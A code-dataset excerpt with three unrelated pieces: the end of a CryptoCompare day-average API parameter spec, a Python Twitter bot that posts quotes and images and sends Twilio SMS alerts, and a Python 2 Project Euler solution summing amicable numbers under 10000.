"type": "string",
"required": true,
"minLen": 1,
"maxLen": 10,
"transform": "Uppercase",
"extraValidation": "KeyInGlobalInfo"
},
{
"name": "tsym",
"type": "string",
"required": true,
"minLen": 1,
"maxLen": 10,
"transform": "Uppercase",
"extraValidation": "KeyInTradePairsOrConversionSymbolTradePairs",
"baseKey": "fsym"
},
{
"name": "e",
"type": "string",
"required": false,
"defaultVal": "CCCAGG",
"minLen": 2,
"maxLen": 30,
"extraValidation": "MarketInPairMarketList"
},
{
"name": "avgType",
"type": "string",
"required": false,
"defaultVal": "HourVWAP",
"minLen": 2,
"maxLen": 30,
"extraValidation": "AverageType"
},
{
"name": "UTCHourDiff",
"type": "int",
"required": false,
"defaultVal": 0,
"minValue": -12,
"maxValue": 14,
"info": "By deafult it does UTC, if you want a different time zone just pass the hour difference. For PST you would pass -8 for example."
},
{
"name": "toTs",
"type": "timestamp",
"required": false,
"extraValidation": "DayAvgTimestampValidation",
"secondsInUnit": 3600,
"cacheLength": 610,
"maxUnits": 2000,
"unit": "hour"
},
{
"name": "extraParams",
"type": "string",
"required": false,
"defaultVal": "NotAvailable",
"minLen": 1,
"maxLen": 50
},
{
"name": "sign",
"type": "bool",
"required": false,
"defaultVal": false,
"info": "If set to true, the server will sign the requests."
}
],
"Examples": [
"https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&UTCHourDiff=-8&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&tryConversion=false&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&avgType=MidHighLow&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&avgType=MidHighLow&tryConversion=false&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=ETH&tsym=GBP&toTs=1487116800&avgType=VolFVolT&tryConversion=false&extraParams=your_app_name",
"https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&toTs=1487116800&e=Bitfinex&extraParams=your_app_name"
],
"CacheDuration": "610 seconds",
"RateLimit": {
"Hour": 8000,
"Minute": 300,
"Second": 15
}
}
},
""" | true |
dab3694632cbac90427dba4f568b8c1b37f41f88 | Python | debv/digitalwastebot | /dwbot.py | UTF-8 | 2,278 | 2.640625 | 3 | [] | no_license | import sys
import os
import twitter
import time
import random
from twilio.rest import TwilioRestClient
from keys import *
def main():
api = twitter.Api(
consumer_key,
consumer_secret,
access_key,
access_secret
)
client = TwilioRestClient(twil_sid, twil_auth)
tweet = 1
tweetedQuotes = 0
imagesPath = os.listdir('./images')
# Put quotes into list for random tweeting
f = open('quotes/all.txt', 'r')
quotes = f.readlines()
f.close
# Put images into list for random tweeting
images = []
for image in imagesPath:
if(image != '.DS_Store'):
images.append('images/'+image)
# Keep tweeting while there are things to tweet
startTime = time.time()
while(len(quotes) > 0):
# Tweet one image for every 10 quotes
if(tweetedQuotes < 10 and quotes is not None):
if(len(quotes) == 1):
tweet = quotes[0]
elif(len(quotes) < 1):
continue
elif(len(quotes) > 1):
tweet = random.choice(quotes)
tweetIndex = quotes.index(tweet)
api.PostUpdate(tweet)
print("QUOTE")
print(len(quotes))
print(tweetIndex)
del quotes[tweetIndex]
tweetedQuotes += 1
elif((tweetedQuotes >= 10 and images is not None) or (quotes is None)):
tweet = random.choice(images)
tweetIndex = images.index(tweet)
api.PostUpdate('',image)
print("IMAGE")
print(len(images))
print(tweetIndex)
del images[tweetIndex]
tweetedQuotes = 0
# Text me if there are 5 images or quotes remaining
if(len(quotes) == 5 or len(images) == 5):
stats = ("DigitalWasteBot is running low on content!\n"
+ str(5)
+ " Quotes Remaining\n"
+ str(6)
+ " Images Remaining")
message = client.messages.create(body=stats,
to="+13059679060",
from_="+17866614259")
time.sleep(21600.0 - ((time.time() - startTime) % 21600.0)) # Every 6 hours
if __name__ == '__main__':
main()
| true |
52631c46b88c0f89622cad05796888ec7e256ff3 | Python | Letoile/project-euler | /problem-21.py | UTF-8 | 1,931 | 4.28125 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Amicable numbers
Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and each of a and b are called amicable
numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284.
The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
---------------------
Дружественные числа
Пусть d(n) определяется как сумма делителей n (числа меньше n, делящие n нацело).
Если d(a) = b и d(b) = a, где a ≠ b, то a и b называются дружественной парой, а каждое из чисел a и b - дружественным
числом.
Например, делителями числа 220 являются 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 и 110, поэтому d(220) = 284. Делители 284 -
1, 2, 4, 71, 142, поэтому d(284) = 220.
Подсчитайте сумму всех дружественных чисел меньше 10000.
"""
def main():
BIG_NUMBER = 10000
divisors_sum = [0, 1]
browsed = []
amicables = []
amicables_sum = 0
for x in xrange(2, BIG_NUMBER):
temp = 0
for y in range(1, int(x/2) + 1):
if x % y == 0:
temp += y
divisors_sum.append(temp)
for x in xrange(1, BIG_NUMBER):
if x not in browsed:
sum = divisors_sum[x]
if sum <= len(divisors_sum) and divisors_sum[sum] == x and sum != x:
amicables_sum += sum + x
amicables.extend([sum, x])
browsed.extend([sum, x])
print amicables_sum
print amicables
if __name__ == "__main__":
main() | true |